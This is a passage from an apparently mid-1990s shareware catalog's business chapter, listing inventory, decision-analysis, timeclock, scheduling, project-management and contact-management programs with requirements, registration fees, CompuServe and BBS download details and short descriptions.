inventory, bill + of materials, work orders, sales / order processing, AR, AP, + purchase orders, quotes, and request for quotes. Easy to use + + Chapter 7, "Business" 290 + + + + table interface includes pick list for key values with online + help. Supports FIFO or LIFO inventory usage. All forms and + reports can be customized by the user. No preprinted forms are + necessary, but are supported. + + + Product: JRE Home Inventory + Log household items for insurance purposes. See full + description on page 550. + + Product: Layout + Author: , 317-856-6052 + Version: 3.1 (03-25-92) + Needs: IBM PC, DOS 2.0 or better. CGA monitor, IBM/Epson FX or + HP LaserJet printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: LAYOUT.ZIP on BBSs (call 715-652-2758 to download it at + no charge); LAYOUT.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 76635,1670 for assistance). + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Keeps graphics layout of office furniture and equipment by room + and a database objects, each with 6 free-form fields. Multiple + rooms can be grouped together to form units such as + departmental charge areas. Inventory reports and export of data + to comma-delimited files for transfer to database programs or + spreadsheets. Data entry is via a mini-CAD system. Makes nice + printed room layouts. Solid system without a lot of frills. + Appeals to the office manager with rolled up sleeves. + + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 283. + + Product: RESTAURANT COST CONTROL + Inventory, purchases & accounts payable. See full description + on page 311. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 108. + + Product: Track-It + Point of sale with inventory control. See full description on + page 278. + + Chapter 7, "Business" 291 + + + + 7.3 Decision analysis tools + + Product: Bubble Chart + Author: , 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; BUBBLE.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 5 (or contact userID 76534,1166 + for assistance). + SWREG#: 6324 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Animated chart that dramatizes the changes of a company's + competitive market position versus its competitors. Companies + are represented by colored sphere that move to reflect the + developing growth rate and market share over a period of time. + Companies that move towards the upper right corner are winners; + companies left in the lower left corner are losers. Import from + spread sheets. Save and print functions. Spot important shifts + in market positions at a glance! + + + Product: LAPC - Loan Advisor for the PC + Calculate & compare loan values and payments. See full + description on page 344. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 300. + + Product: Simstat + Complete statistics and simulation program. See full + description on page 395. + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 321. + + Chapter 7, "Business" 292 + + + + Product: TreePlan for DOS + Author: , 415-673-6217 + Version: 2.1 (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support. + Look for: availability unknown on BBSs; TRED21.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 6 (or contact userID 71330,3445 for + assistance). + PsL#: 10904 + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Decision tree software for analyzing risky decisions. Shows + sequence of decisions and events over time. Prints tree + diagrams. Solves for optimal strategy. Performs sensitivity + analysis of probability, value, and risk attitude. Includes + exponential utility, automatic EVPI, Bayes revision, and 500 + lines of context-sensitive on-screen help. User manual has + complete command reference, step-by-step tutorial, and two + application examples explaining decision tree concepts and + terminology. + + + Product: UDECIDE + Author: , 206-523-6135 + Version: 1.06 (11-10-92) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; UDCIDE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 76703,3046 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Helps you make decisions such as which software or hardware to + purchase; ratings surveys; which project to pursue; selecting + colleges, movies, stocks, or wines. You enter a list of + elements to evaluate the contenders, giving each a weight. Then + you enter the options, assigning values to each element. Then + sort to obtain an ordered list of the best options. Or perform + what-if analyses by changing elements or weights. + + Chapter 7, "Business" 293 + + + + 7.4 Equipment use & maintenance + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 566. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 233. + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 327. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 358. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 94. + + Product: Vehicle Costs + Author: , +61-3-700-3764 + Version: 2.4 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Hard disk. + Strongly recommended: Epson printer. + Registration fee: $US50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; disks of other shareware. + Look for: availability unknown on BBSs; VEHI24.ZIP on CompuServe + in CIS:CARS forum LIBrary 2 (or contact userID 100026,370 for + assistance). + SWREG#: 2619 + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + Reports on costs by category or item over a range of years. + Records fuel cost and consumption. Yearly average cost per mile + price per gallon. No limit to number of vehicles recorded. + Yearly totals of fuel purchased, distance traveled, cost of + parts and service. Notepad to record service and trip details. + Database editor for entry error correction. Tax file to record + Business deductable travel. Suitable for private or fleet use. + + + Product: x-SKED3 + Network room/resource scheduling system. See full description + on page 382. + + Chapter 7, "Business" 294 + + + + 7.4.1 Computer-use logging + + Product: JobLog Project Timekeeper + Author: , 813-920-0882 + Version: 2.0 (05-08-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Mouse; Epson printer. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of CompuServe, GEnie, mail + support; discounts on upgrades. + Look for: LOG20.ZIP on BBSs; LOGF20.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 0 (or contact userID 73160,676 for + assistance); LOG20.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID B.SUTTON1 for assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Designed to help you keep track of how you spend your computer + time. It is simple to use whether it be from the DOS prompt, a + batch file, or through the menu systems. With it, you can log + project times automatically, without user input. Great for + people who bill for their computer work. Sends reports the + printer or to a disk file for input to your favorite word + processor. + + + Product: PUBLIC ACCESS(tm) + Author: , 303-671-0800 + Version: 2.5 (09-05-94) + Needs: IBM PC, DOS 2.11 or better. 620k RAM; Hard disk. + Strongly recommended: VGA monitor; Hercules monitor; Modem; + Mouse; Epson printer. Procomm Plus v2.x; magnetic swipe + reader; PRODIGY service. + Registration fee: $89.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter support; 1-month + return policy; runtime license; site license; bonus utilities; + all ASP-wide offers (see page 5); discounts on other products. + 2-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: PACCS25.EXE on BBSs (multiple files) (call 303-665-6091 + to download it at no charge); PACCS*.EXE on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 70505,531 for assistance); PACCS*.EXE on GEnie in IBMPC forum + + Chapter 7, "Business" 295 + + + + LIBrary 4 (multiple files) (or contact userID XTY25572 for + assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Front-end control menu for public libraries and other business + entities offering casual PC use to the general public. Will + launch any DOS or MS-Windows based programs. Site may offer + controlled access to application programs and (via modem) to + online data communications (if you have PCPLUS 2.01). Up to 12 + step autologon. Patrons pay with cash or credit card. Credit + cards are pre-validated before access allowed. Set rates by + the minute, long distance minute, page, session, and overall + event. + + + Product: TimeClock + Author: , 716-293-3241 + Version: 1.1 (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, mail support; + bonus utilities; disks of other shareware; discounts on + upgrades; registration commissions. 1 free update disk(s) sent + out. + Look for: TIMCLK11.ZIP on BBSs; TIMCLK.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 74034,1441 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of the time you've spent on your computer. Time is + charged to one or more "projects" of your choosing by "punching + in" when you begin work. In addition, projects may be grouped + in different categories, such as business and pleasure. Usage + can then be summarized by project and category, giving total + hours and percentage of use for each project and category. This + is the information you need to justify a deduction for business + use of your computer. + + Chapter 7, "Business" 296 + + + + 7.5 Employee management/scheduling + + Product: Business Clock Link + Author: , 318-949-4399 + Version: 1.00 (12-06-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $175.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. + Look for: availability unknown on BBSs; BCLINK.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 6 (or contact userID 70262,114 for + assistance). + PsL#: 11665 + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + A networkable PC time clock with real-time job reporting + system, "blue collar" E-mail, clock-in/out animation, on-line + worker discipline, and "ticker tape" reporting of all + transactions. Written in C with dBASE file format. Oriented + toward the needs of Managers, so it is called "The Clock That + Means Business". Great use for old XT's. + + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 139. + + Product: DAYO SERVICE DISPATCH + Manage service & repair work; dispatch tech. See full + description on page 300. + + Product: FBScheduler [***] + Author: + Version: 1.00 (10-20-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; CGA monitor; Hard + disk; Mouse. Printer must support compressed mode (132 + characters across). + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 6 months of unlimited + CompuServe, mail support; bonus utilities. + Look for: availability unknown on BBSs. + PsL#: 14263 + Download size: 1965k (about 146 minutes with a 2400 baud modem) + Description: + An employee/job scheduling system for a traditional, 3 shift + operation. Computer generation of preliminary schedules + supported. Holiday, Incidental, and First and Second Day Off + Overtime tracked. Days off must be sequential but may wrap + from Sunday to Monday. Job Restrictions supported. Vacation + + Chapter 7, "Business" 297 + + + + Scheduling supported. Eliminates the chance of scheduling to + people to the same job at the same time and greatly reduces the + chance of failing to schedule a job! + + + Product: Flexitime/Time Logging + Author: , +44-(0)1203-388031 + Version: 5.32 (06-01-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: L-35.00 (add L-10.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, mail support; 1-month return policy; LAN + license; site license; registration commissions. 3-month free + upgrading allowed. + Look for: FTTLV532.ZIP on BBSs (call +44-(0)1203-352326 to + download it at no charge); FTTLV532.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 5 (or contact userID 100102,1012 for + assistance). + SWREG#: 3970 + PsL#: 14086 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Designed to achieve seamless integration between recording + employee attendance (when they are at work) and what they are + doing with that time. The organisation can then monitor + attendance, holidays, personal and team performance and produce + billing information for clients. Data can also be used by and + exported to other systems. + + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 319. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 329. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 125. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 303. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 125. + + Chapter 7, "Business" 298 + + + + Product: RideMatch + Author: , 206-866-3781 + Version: 1.0 (11-11-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $75.00 (add $5.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; site license; all ASP-wide offers (see page 5); disks + of other shareware; discounts on upgrades. 6-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; RIDE.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 70322,231 for + assistance). + Download size: 114k (about nine minutes with a 2400 baud modem) + Description: + An easy to use, menu driven program designed exclusively for + matching employees for car or van pooling. Written in a + mainframe programming language it is extremely fast and has + unlimited record capacity. It will even consider the shift the + employee works before matching. View the information on screen + or print to a report. Supports lasers and dot-matrix and can + also print to a file. + + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 300. + + Product: Service Call Manager + Manage service calls & information. See full description on + page 301. + + Product: TASK MASTER + Project tracking program. See full description on page 303. + + Product: Time Keeper [***] + Author: , 516-369-4191 + Version: 2.7 (10-07-95) + Needs: IBM 80386, Windows 3.1 or better. 8k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; VBRUN300.DLL. + Registration fee: $50.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited fax, + CompuServe, mail support; all ASP-wide offers (see page 5); + + Chapter 7, "Business" 299 + + + + discounts on other products; discounts on upgrades. 6-month + free upgrading allowed. + Look for: TK27.ZIP on BBSs; TK27.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 0 (or contact userID 102703,554 for assistance). + Download size: 2800k (about 208 minutes with a 2400 baud modem) + Description: + A database to record and report on employee attendance. Records + all times worked including OT and Comp Time. Records time off + including vacation, sick, holiday, Comp Time, and any other. + Electronic "punch clock" can be used by those employees that + have access to a pc running the Time Keeper. Professional + reports are used to retrieve the stored data. Featured in + Windows Magazine Superior Shareware Section of the August '95 + edition. + + + Product: Timeclock I + Author: , 800-394-4839 + Version: 2.4s (04-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $79.95 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, newsletter + support; LAN license; bonus utilities; discounts on other + products. + Look for: TC24S.ZIP on BBSs; TC24S.EXE on CompuServe in CIS:PCAPP + forum LIBrary 6 (or contact userID 73770,1574 for assistance). + Download size: 303k (about 23 minutes with a 2400 baud modem) + Description: + Turn your PC into a timeclock and save hundreds of dollars! + Logs employees' "in" and "out" times via keyboard or barcode + and automatically tabulates their hours at the end of each pay + period. Calculates overtime and tracks sick, vacation and + holiday hours. Tracks project/billable hours and if your + networked, employees can "punch" right from their own stations. + Send announcements via the program's bulletin board, or private + messages to individual employees. Eliminates mistakes and + saves time. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 308. + + Product: WinTickler + Tickler file management program. See full description on + page 304. + + Product: x-OUT3 + Network in/out tracking system. See full description on + page 381. + + Chapter 7, "Business" 300 + + + + Product: x-OUT4 + Network in-out tracking system for Windows. See full + description on page 382. + + + 7.6 Project management + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 233. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 566. + + Product: DAYO SERVICE DISPATCH + Author: , 407-291-3960 + Version: 3.20+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $299.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOS1.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOS1.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Designed for service and/or repair businesses, departments, or + organizations. Use it to initiate service or work orders, + record any notes, dispatch technicians, record inventory and + labor used, and then close and create an invoice for services + rendered. Features include: customer and inventory maintenance, + warehouse transfers, pick tickets or pull sheets, invoicing, + laser forms, and many reports. + + Chapter 7, "Business" 301 + + + + Product: RPMSHARE + Author: , 604-538-2326 + Version: 3.42 (12-05-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; EGA monitor; Hard + disk; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 5); discounts on upgrades. 12-month free + upgrading allowed. 4 free update disk(s) sent out. Employee + time/assignment planning literature. + Look for: RPMSHA.EXE on BBSs; RPMSHA.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (or contact userID 70254,3443 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A multi-resource/multi-projects management program unlike any + other. Very attractive to the horizontal market of individual, + small firm and home office users. It shows who is over/ + underloaded, by how much in hours and currency, on which + projects/assignments, and on what dates. + + + Product: Service Call Manager + Author: , 702-329-6868 + Version: 2.0 (02-08-95) + Needs: IBM AT (80286), DOS 3.3 or better. + Registration fee: $85.00 (add $5.00 for shipping to U.S. + addresses) (add $7.50 for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Helps you manage service calls. You can track the status of the + calls, wheather they are closed, what the technician did while + on site and what parts were used. Can be adapted to many type + of service organizations, such as appliance repair, computer + repair, etc. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 308. + + Chapter 7, "Business" 302 + + + + 7.6.1 Project bidding & costing + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 368. + + Product: ProDev*EPRICE + Author: , 616-788-2243 + Version: 6.0 (12-06-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; CGA monitor; Hard + disk. ProDev*QUOTE software. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support. + Look for: PDEPRIC6.ZIP on BBSs; PDEPRI.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72617,1266 for + assistance). + Download size: 283k (about 21 minutes with a 2400 baud modem) + Description: + Provides for converting weekly price service data files for + electrical, heating, plumbing and air conditioning items to the + ProDev*QUOTE file format to automatically update material + prices. Includes sample files for USA, Australian and UK price + services. The user subscribes separately to the desired price + service. + + + Product: ProDev*QUOTE Quote/Bid System + Author: , 616-788-2243 + Version: 6.0c (05-24-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $65.00 (Canadian dollars) (add $5.00 (Canadian + dollars) for shipping to U.S. addresses) (add $5.00 (Canadian + dollars) for shipping to Canadian addresses) (add $8.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support. + 3-month return policy. + Look for: PDQUOT6C.ZIP on BBSs; PDQUOT.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72617,1266 for + assistance). + Download size: 418k (about 31 minutes with a 2400 baud modem) + Description: + Packed with features for any type/size business from + consultants to one-person contractors to small/large + manufacturers. Used by many electrical, heating, plumbing, + remodeling, major construction contractors, florists, flooring + stores, landscape contractors, printing shops, maintenance + services, well... just about any type business. The system + defaults are highly configurable. Pull-down menus, point & + shoot browse and F1 help windows. + + Chapter 7, "Business" 303 + + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 303. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 299. + + 7.6.2 Project scheduling + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 125. + + Product: A Project/Event Planner + Author: , 808-395-5587 + Version: 3.4 (12-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $37.00 + Registration benefits: printed manual; 31/2" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + limited return policy; bonus utilities; discounts on upgrades. + Look for: APLANR34.ZIP on BBSs; APLANR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 750 + PsL#: 11168 + Download size: 282k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + (Finalist in 1994 PC Magazine/Ziff-Davis Shareware Awards) Use + for quick overall project planning, activity and resource + scheduling. Can assign income/cost amounts to events/resources + to estimate project income/cost. Can link events where start/ + end times are automatically calculated. Can shift all events + forward/backward in time. Handles multiple calendars. Allows + free-from drawing of events anywhere on a scale of hr/day/week/ + month/yr. On-line help, sample plans provided. + + + Product: TASK MASTER + Author: , 703-534-1726 + Version: 2.4c (11-24-93) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; Hard + disk. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 5); + + Chapter 7, "Business" 304 + + + + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: TM24C.ZIP on BBSs (call 703-534-7812 to download it at + no charge); TM24C.ZIP on CompuServe in CIS:IBMAPPS forum + LIBrary 6 (or contact userID 72357,2034 for assistance). + SWREG#: 368 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A project tracking program which allows you to easily keep + track of office assignments, correspondence, projects, and + tasks of any kind. Features automatic status updating, report + writer, form letter utility, appointment calendar, & query + builder. All international date formats. Unlimited records. + Standard dBase data file. + + + Product: WinTickler + Author: + Version: 1.0 (02-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; VGA + monitor; Hard disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $24.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; bonus utilities; all ASP-wide offers + (see page 5). Lifetime free upgrading allowed. + Look for: WTICKLER.ZIP on BBSs. + SWREG#: 2151 + PsL#: 11135 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A computerized tickler file management program for Windows. It + allows you to quickly setup reminders for all your personal and + professional tasks. Templates are included for common tasks + like managing contacts, keeping track of birthdays, or + scheduling medical check-ups. You can also define your own + categories. Can be used to quickly create monthly calendars + and Gantt Charts with WYSIWYG printing. MDI, toolbar, multiple + views, and on-line help. + + + 7.7 Client management + + Product: 2DO Personal Task Manager + Personal task and contact manager for Windows. See full + description on page 137. + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 315. + + Chapter 7, "Business" 305 + + + + Product: DAYO BAR CODE 3 OF 9 + Print 3 of 9 barcodes onto Epson/IBM printer. See full + description on page 286. + + Product: DAYO MEMBERSHIP + Author: , 407-291-3960 + Version: 4.40+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYODE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYODE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + An application designed to track membership for an association + or organization. The ability to maintain records for donations, + dues, payments and/or invoices has also been incorporated into + the package. Use it to record member information and + optionally, maintain a simple accounting system for dues and/or + donations. Many reports and reporting routines are included in + this package, ie: members list, notes, statements, labels, + payments, form letters and much more. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Author: , 407-291-3960 + Version: 4.42+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $189.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 306 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOCE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOCE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Designed to aid the business or, individual sales person, in + the creation of price books and quotes/sales orders, and in the + management of contracts and calendar events. It is by default a + multiuser system, allowing almost unlimited numbers of users to + have the aility to simultaneously access the same data on a PC + based LAN/network. + + + Product: DAYO TIME & BILLING + Inventory, invoicing, receivables, projects. See full + description on page 268. + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 241. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 312. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 129. + + Product: NAMEBASE + Author: + Version: 3.2 (02-26-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support. + Look for: NAME32.ZIP on BBSs; NAME32.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of people and companies. Stores 4 phone numbers, 2 + addresses, 2 dates, and thousands of characters of notes for + each record. Full mouse support. Prints a pocket-size address + book, labels, rolodex cards, envelopes, and reports. Creates + mail-merge files for use with most word processors. Dials the + + Chapter 7, "Business" 307 + + + + phone. Displays multiple records at once. Extremely easy to + use. Type the first few characters of any person's name and + you are immediately viewing all information about that person. + + + Product: Personal Hotnet + Author: , 713-463-7452 + Version: 4.0 (09-30-93) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); discounts on upgrades. + Look for: HOTNET.ZIP on BBSs; PERHOT.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 71336,336 for + assistance); 